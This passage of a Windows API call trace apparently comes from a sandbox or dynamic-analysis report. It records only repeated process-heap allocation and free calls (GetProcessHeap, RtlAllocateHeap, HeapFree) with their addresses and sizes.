GetProcessHeap () returned 0x4f10000 [0060.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.948] GetProcessHeap () returned 0x4f10000 [0060.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.948] GetProcessHeap () returned 0x4f10000 [0060.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.948] GetProcessHeap () returned 0x4f10000 [0060.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.948] GetProcessHeap () returned 0x4f10000 [0060.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.948] GetProcessHeap () returned 0x4f10000 [0060.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.948] GetProcessHeap () returned 0x4f10000 [0060.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.949] GetProcessHeap () returned 0x4f10000 [0060.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.949] GetProcessHeap () returned 0x4f10000 [0060.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.949] GetProcessHeap () returned 0x4f10000 [0060.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.949] GetProcessHeap () returned 0x4f10000 [0060.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.949] GetProcessHeap () returned 0x4f10000 [0060.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.949] GetProcessHeap () returned 0x4f10000 [0060.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.949] GetProcessHeap () returned 0x4f10000 [0060.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.949] GetProcessHeap () returned 0x4f10000 [0060.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.949] GetProcessHeap () returned 0x4f10000 [0060.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.949] GetProcessHeap () returned 0x4f10000 [0060.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.949] GetProcessHeap () returned 0x4f10000 [0060.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.949] GetProcessHeap () returned 0x4f10000 [0060.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.949] GetProcessHeap () returned 0x4f10000 [0060.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.949] GetProcessHeap () returned 0x4f10000 [0060.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.949] GetProcessHeap () returned 0x4f10000 [0060.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.949] GetProcessHeap () returned 0x4f10000 [0060.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.949] GetProcessHeap () returned 0x4f10000 [0060.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.949] GetProcessHeap () returned 0x4f10000 [0060.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.950] GetProcessHeap () returned 0x4f10000 [0060.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.950] GetProcessHeap () returned 0x4f10000 [0060.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.950] GetProcessHeap () returned 0x4f10000 [0060.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.950] GetProcessHeap () returned 0x4f10000 [0060.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.950] GetProcessHeap () returned 0x4f10000 [0060.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.950] GetProcessHeap () returned 0x4f10000 [0060.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.950] GetProcessHeap () returned 0x4f10000 [0060.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.950] GetProcessHeap () returned 0x4f10000 [0060.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.950] GetProcessHeap () returned 0x4f10000 [0060.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.950] GetProcessHeap () returned 0x4f10000 [0060.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.950] GetProcessHeap () returned 0x4f10000 [0060.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.950] GetProcessHeap () returned 0x4f10000 [0060.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.950] GetProcessHeap () returned 0x4f10000 [0060.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.950] GetProcessHeap () returned 0x4f10000 [0060.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.950] GetProcessHeap () returned 0x4f10000 [0060.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.950] GetProcessHeap () returned 0x4f10000 [0060.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.950] GetProcessHeap () returned 0x4f10000 [0060.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.951] GetProcessHeap () returned 0x4f10000 [0060.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.951] GetProcessHeap () returned 0x4f10000 [0060.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.951] GetProcessHeap () returned 0x4f10000 [0060.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.951] GetProcessHeap () returned 0x4f10000 [0060.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.951] GetProcessHeap () returned 0x4f10000 [0060.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.951] GetProcessHeap () returned 0x4f10000 [0060.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.951] GetProcessHeap () returned 0x4f10000 [0060.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.951] GetProcessHeap () returned 0x4f10000 [0060.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.951] GetProcessHeap () returned 0x4f10000 [0060.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.951] GetProcessHeap () returned 0x4f10000 [0060.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.951] GetProcessHeap () returned 0x4f10000 [0060.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.951] GetProcessHeap () returned 0x4f10000 [0060.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.951] GetProcessHeap () returned 0x4f10000 [0060.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.951] GetProcessHeap () returned 0x4f10000 [0060.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.951] GetProcessHeap () returned 0x4f10000 [0060.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.951] GetProcessHeap () returned 0x4f10000 [0060.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.951] GetProcessHeap () returned 0x4f10000 [0060.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.952] GetProcessHeap () returned 0x4f10000 [0060.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.952] GetProcessHeap () returned 0x4f10000 [0060.952] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.952] GetProcessHeap () returned 0x4f10000 [0060.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.952] GetProcessHeap () returned 0x4f10000 [0060.952] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.952] GetProcessHeap () returned 0x4f10000 [0060.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.952] GetProcessHeap () returned 0x4f10000 [0060.952] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.952] GetProcessHeap () returned 0x4f10000 [0060.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.952] GetProcessHeap () returned 0x4f10000 [0060.952] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.952] GetProcessHeap () returned 0x4f10000 [0060.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.952] GetProcessHeap () returned 0x4f10000 [0060.952] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.952] GetProcessHeap () returned 0x4f10000 [0060.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.952] GetProcessHeap () returned 0x4f10000 [0060.952] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.952] GetProcessHeap () returned 0x4f10000 [0060.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.952] GetProcessHeap () returned 0x4f10000 [0060.952] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.952] GetProcessHeap () returned 0x4f10000 [0060.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.952] GetProcessHeap () returned 0x4f10000 [0060.952] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.952] GetProcessHeap () returned 0x4f10000 [0060.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.952] GetProcessHeap () returned 0x4f10000 [0060.953] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.953] GetProcessHeap () returned 0x4f10000 [0060.953] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.953] GetProcessHeap () returned 0x4f10000 [0060.953] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.953] GetProcessHeap () returned 0x4f10000 [0060.953] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.953] GetProcessHeap () returned 0x4f10000 [0060.953] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.953] GetProcessHeap () returned 0x4f10000 [0060.953] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.953] GetProcessHeap () returned 0x4f10000 [0060.953] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.953] GetProcessHeap () returned 0x4f10000 [0060.953] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.953] GetProcessHeap () returned 0x4f10000 [0060.953] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.953] GetProcessHeap () returned 0x4f10000 [0060.953] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.953] GetProcessHeap () returned 0x4f10000 [0060.953] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.953] GetProcessHeap () returned 0x4f10000 [0060.953] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.953] GetProcessHeap () returned 0x4f10000 [0060.953] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.953] GetProcessHeap () returned 0x4f10000 [0060.953] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.953] GetProcessHeap () returned 0x4f10000 [0060.953] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.953] GetProcessHeap () returned 0x4f10000 [0060.953] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.953] GetProcessHeap () returned 0x4f10000 [0060.953] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.953] GetProcessHeap () returned 0x4f10000 [0060.953] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.954] GetProcessHeap () returned 0x4f10000 [0060.954] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.954] GetProcessHeap () returned 0x4f10000 [0060.954] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.954] GetProcessHeap () returned 0x4f10000 [0060.954] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.954] GetProcessHeap () returned 0x4f10000 [0060.954] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.954] GetProcessHeap () returned 0x4f10000 [0060.954] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.954] GetProcessHeap () returned 0x4f10000 [0060.954] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.954] GetProcessHeap () returned 0x4f10000 [0060.954] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.954] GetProcessHeap () returned 0x4f10000 [0060.954] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.954] GetProcessHeap () returned 0x4f10000 [0060.954] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.954] GetProcessHeap () returned 0x4f10000 [0060.954] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.954] GetProcessHeap () returned 0x4f10000 [0060.954] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.954] GetProcessHeap () returned 0x4f10000 [0060.954] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.954] GetProcessHeap () returned 0x4f10000 [0060.954] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.954] GetProcessHeap () returned 0x4f10000 [0060.954] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.954] GetProcessHeap () returned 0x4f10000 [0060.954] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.954] GetProcessHeap () returned 0x4f10000 [0060.954] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.954] GetProcessHeap () returned 0x4f10000 [0060.954] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.955] GetProcessHeap () returned 0x4f10000 [0060.955] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.955] GetProcessHeap () returned 0x4f10000 [0060.955] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.955] GetProcessHeap () returned 0x4f10000 [0060.955] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.955] GetProcessHeap () returned 0x4f10000 [0060.955] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.955] GetProcessHeap () returned 0x4f10000 [0060.955] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.955] GetProcessHeap () returned 0x4f10000 [0060.955] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.955] GetProcessHeap () returned 0x4f10000 [0060.955] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.955] GetProcessHeap () returned 0x4f10000 [0060.955] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.955] GetProcessHeap () returned 0x4f10000 [0060.955] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.955] GetProcessHeap () returned 0x4f10000 [0060.955] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.955] GetProcessHeap () returned 0x4f10000 [0060.955] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.955] GetProcessHeap () returned 0x4f10000 [0060.955] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.955] GetProcessHeap () returned 0x4f10000 [0060.955] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.955] GetProcessHeap () returned 0x4f10000 [0060.955] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.955] GetProcessHeap () returned 0x4f10000 [0060.955] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.955] GetProcessHeap () returned 0x4f10000 [0060.955] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.955] GetProcessHeap () returned 0x4f10000 [0060.955] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.955] GetProcessHeap () returned 0x4f10000 [0060.955] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.956] GetProcessHeap () returned 0x4f10000 [0060.956] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.956] GetProcessHeap () returned 0x4f10000 [0060.956] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.956] GetProcessHeap () returned 0x4f10000 [0060.956] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.956] GetProcessHeap () returned 0x4f10000 [0060.956] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.956] GetProcessHeap () returned 0x4f10000 [0060.956] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.956] GetProcessHeap () returned 0x4f10000 [0060.956] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.956] GetProcessHeap () returned 0x4f10000 [0060.956] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.956] GetProcessHeap () returned 0x4f10000 [0060.956] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.956] GetProcessHeap () returned 0x4f10000 [0060.956] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.956] GetProcessHeap () returned 0x4f10000 [0060.956] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.956] GetProcessHeap () returned 0x4f10000 [0060.956] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.956] GetProcessHeap () returned 0x4f10000 [0060.956] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.956] GetProcessHeap () returned 0x4f10000 [0060.956] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.956] GetProcessHeap () returned 0x4f10000 [0060.956] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.956] GetProcessHeap () returned 0x4f10000 [0060.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.957] GetProcessHeap () returned 0x4f10000 [0060.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.957] GetProcessHeap () returned 0x4f10000 [0060.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.957] GetProcessHeap () returned 0x4f10000 [0060.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.957] GetProcessHeap () returned 0x4f10000 [0060.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.957] GetProcessHeap () returned 0x4f10000 [0060.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.957] GetProcessHeap () returned 0x4f10000 [0060.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.957] GetProcessHeap () returned 0x4f10000 [0060.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.957] GetProcessHeap () returned 0x4f10000 [0060.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.957] GetProcessHeap () returned 0x4f10000 [0060.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.957] GetProcessHeap () returned 0x4f10000 [0060.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.957] GetProcessHeap () returned 0x4f10000 [0060.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.957] GetProcessHeap () returned 0x4f10000 [0060.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.957] GetProcessHeap () returned 0x4f10000 [0060.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.957] GetProcessHeap () returned 0x4f10000 [0060.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.957] GetProcessHeap () returned 0x4f10000 [0060.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.957] GetProcessHeap () returned 0x4f10000 [0060.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.957] GetProcessHeap () returned 0x4f10000 [0060.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.957] GetProcessHeap () returned 0x4f10000 [0060.958] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.958] GetProcessHeap () returned 0x4f10000 [0060.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.958] GetProcessHeap () returned 0x4f10000 [0060.958] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.958] GetProcessHeap () returned 0x4f10000 [0060.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.958] GetProcessHeap () returned 0x4f10000 [0060.958] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.958] GetProcessHeap () returned 0x4f10000 [0060.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.958] GetProcessHeap () returned 0x4f10000 [0060.958] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.958] GetProcessHeap () returned 0x4f10000 [0060.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.958] GetProcessHeap () returned 0x4f10000 [0060.958] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.958] GetProcessHeap () returned 0x4f10000 [0060.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 